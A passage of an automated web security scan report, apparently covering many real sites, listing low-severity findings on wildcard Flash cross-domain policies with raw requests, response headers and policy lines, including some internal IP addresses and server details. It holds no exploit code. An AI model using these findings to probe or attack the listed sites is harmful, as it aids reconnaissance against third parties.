xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFil
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...
7.454. http://www.toyota.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toyota.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 11 Oct 2010 22:20:04 GMT
ETag: "2515a-487-c30f8d00"
Accept-Ranges: bytes
Content-Length: 1159
Content-Type: application/xml
X-N: S
Date: Sat, 02 Apr 2011 13:50:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="toyota.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.toyota.com" secure="false" />
...[SNIP]...
<allow-access-from domain="toyotareasons.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.toyotareasons.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.firstbornmultimedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ichameleongroup.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*. clearspring.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*. lolzllc.com" secure="false" />
...[SNIP]...
7.455. http://www.toysrus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toysrus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.toysrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:24 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT
ETag: "540db5-39b-48bf5ef3f6400"
Accept-Ranges: bytes
Content-Length: 923
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:32:24 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.toysrus.com" />
<allow-access-from domain="www.babiesrus.com" />
<allow-access-from domain="trus.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="63.240.110.201" />
<allow-access-from domain="206.16.220.201" />
<allow-access-from domain="172.20.1.201" />
<allow-access-from domain="172.21.1.201" />
<allow-access-from domain="vqascweb1.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vqascweb2.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="toysrus.shoplocal.com" secure="true" />
...[SNIP]...
<allow-access-from domain="beta.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...
7.456. http://www.tracfone.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tracfone.com

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2994269697; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Connection: close
Date: Sat, 02 Apr 2011 13:33:19 GMT
Content-Length: 568
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.15&agentName=TRAC&servletName=FileServlet&agentHost=dp-web5&agentProcess=WebLogic
Set-Cookie: TLTSID=F445257AC78A7253BF1B78ED0006C6C8; path=/
Set-Cookie: TLTUID=721D822B71F8142E41E245115059866A; expires=Sunday, 01-Apr-2012 13:33:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF8780AF82D0F0117BCBAFB313C34

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.redcated" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
7.457. http://www.travelocity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.travelocity.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
Set-Cookie: tyrg1st=668553C086D10CAB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Set-Cookie: SID=T000V00000X900941104032510625012971825; path=/; domain=.travelocity.com
Last-Modified: Tue, 24 Mar 2009 05:46:07 GMT
ETag: "5a7"
Accept-Ranges: bytes
Content-Length: 1447
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="i.travelpn.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelpn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelocity.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="travel.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ag.travelocity.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="hg.travelocity.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="design.int.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.travelpn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dotomi.com" secure="false"/>
...[SNIP]...
7.458. http://www.tripadvisor.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tripadvisor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:18 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 12:09:15 GMT
Accept-Ranges: bytes
Content-Length: 357
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.daodao.com" />
<allow-access-from domain="*.ddcdn.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.tripadvisor.com" />
...[SNIP]...
7.459. http://www.true.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.true.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.true.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 29 Jun 2009 15:30:26 GMT
Accept-Ranges: bytes
ETag: "9a1cbc86cef8c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:40 GMT
Connection: keep-alive
Content-Length: 576
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!--The site-control element defines the meta-policy for
...[SNIP]...
<allow-access-from domain="*.truebeginnings.com" />
<allow-access-from domain="*.true.com" />
...[SNIP]...
7.460. http://www.trulia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trulia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trulia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 30 Mar 2011 22:59:11 GMT
ETag: "1582730-192-49fbb1ff9adc0"
Accept-Ranges: bytes
Content-Length: 402
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:35:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.trulia.com" />
<allow-access-from domain="*.trulia.com" />
<allow-access-from domain="*.trulia-cdn.com" />
<allow-access-from domain="*.stamen.com" />
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...
7.461. http://www.tv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 465
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="image.com.com" />
<allow-access-from domain="img.gamespot.com" />
<allow-access-from domain="i.i.com.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
7.462. http://www.tvguide.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tvguide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tvguide.com

Response

HTTP/1.0 200 OK
Content-Length: 1209
Content-Type: text/xml
Last-Modified: Thu, 29 Jul 2010 23:00:39 GMT
Accept-Ranges: bytes
ETag: "3647dcdc712fcb1:1a2d"
Server: Microsoft-IIS/6.0
P3P: policyref=" /w3c/p3p.xml", CP="CAO PSA OUR BUS"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.tvguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="tvguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cmsauthor.tvguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.arkadium.com/*" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="testing.arkadium.com/*" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bignetworkboss.com/*" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mtumi.dev" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.motiontek.dev" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.motiontek.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.maven.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
7.463. http://www.univision.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.univision.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.univision.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:54:19 GMT
Content-length: 432
Content-type: text/xml
Last-modified: Mon, 20 Dec 2010 16:16:47 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!-- http://www.univision.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.univision.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.streamtheworld.com" />
<allow-access-from domain="*.streamtheworld.net" />
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.uvnimg.com" />
...[SNIP]...
7.464. http://www.ups.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:16 GMT
Server: Apache
Last-Modified: Sun, 04 Jan 2009 01:06:17 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: User-Agent
Connection: close
Content-Type: text/xml


<cross-domain-policy>
   <allow-access-from domain="*.ups.com" secure="false"/>
</cross-domain-policy>
7.465. http://www.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 02 Apr 2011 13:32:44 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...
7.466. http://www.use.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.use.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.use.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 19 May 2010 22:07:28 GMT
Accept-Ranges: bytes
Content-Length: 185
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*.torontoflex.com" />
   <allow-access-from domain="*.use.com" />
</cross-domain-policy>
7.467. http://www.usgs.gov/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usgs.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usgs.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Length: 224
Content-Type: application/xml
ETag: "38331e46-e0-47fbc40961741"
Last-Modified: Tue, 16 Feb 2010 18:53:41 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
   <cross-domain-policy>
       <allow-access-from domain="*.usgs.gov" to-ports="80" />
...[SNIP]...
7.468. http://www.usmagazine.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usmagazine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usmagazine.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) DAV/2 mod_jk/1.2.28 PHP/5.2.10
Last-Modified: Tue, 08 Feb 2011 20:21:10 GMT
ETag: "e254e7-2d3-49bcb16cc5980"
Content-Type: application/xml
Content-Length: 723
X-Varnish: 246730193 246729216
Date: Sat, 02 Apr 2011 13:26:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...
7.469. http://www.vast.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vast.com

Response

HTTP/1.1 200 OK
ETag: "1ae1a37-16d-49f03a2fc3ac0"
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA"
Accept-Ranges: bytes
Content-Length: 365
Date: Sat, 02 Apr 2011 13:43:38 GMT
Connection: close
Last-Modified: Mon, 21 Mar 2011 20:04:35 GMT
Server: Apache
Content-Type: text/xml
Keep-Alive: timeout=15, max=78

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.aolcdn.com"/>
...[SNIP]...
7.470. http://www.verizon.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verizon.net

Response

HTTP/1.0 200 OK
Content-Length: 375
Content-Type: text/xml
Last-Modified: Wed, 28 Oct 2009 19:15:58 GMT
Accept-Ranges: bytes
ETag: "02b2b14358ca1:138d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 02 Apr 2011 13:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*.verizon.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.verizon.com" to-ports="*" secure="false"/>
...[SNIP]...
7.471. http://www.victoriassecret.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.victoriassecret.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.victoriassecret.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 09 Jul 2010 16:21:39 GMT
ETag: "147-48af6cc2e0ac0"
Accept-Ranges: bytes
Content-Length: 327
SID: 502
Content-Type: application/xml
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS UNI PUR NAV INT STA PRE OTC"
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:42:33 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.vspink.com" />
   <allow-access-from domain="*.vspink.resource.com" />
   <allow-access-from domain="*.vspinknew.resource.com" />
   <allow-access-from domain="*.victoriassecret.com"/>
   <allow-access-from domain="*.limited.com"/>
...[SNIP]...
7.472. http://www.videobash.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.videobash.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:09 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
Last-Modified: Mon, 24 Jan 2011 19:32:09 GMT
ETag: "138-4d3dd3b9"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: application/xml
X-Pad: avoid browser bug
Set-Cookie: RNLBSERVERID=ded543; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.videobash.com" />
   <allow-access-from domain="*.trafficjunky.net" />
   <allow-access-from domain="*.adap.tv" />
...[SNIP]...
7.473. http://www.walletpop.com/crossdomain.xml  previous  next

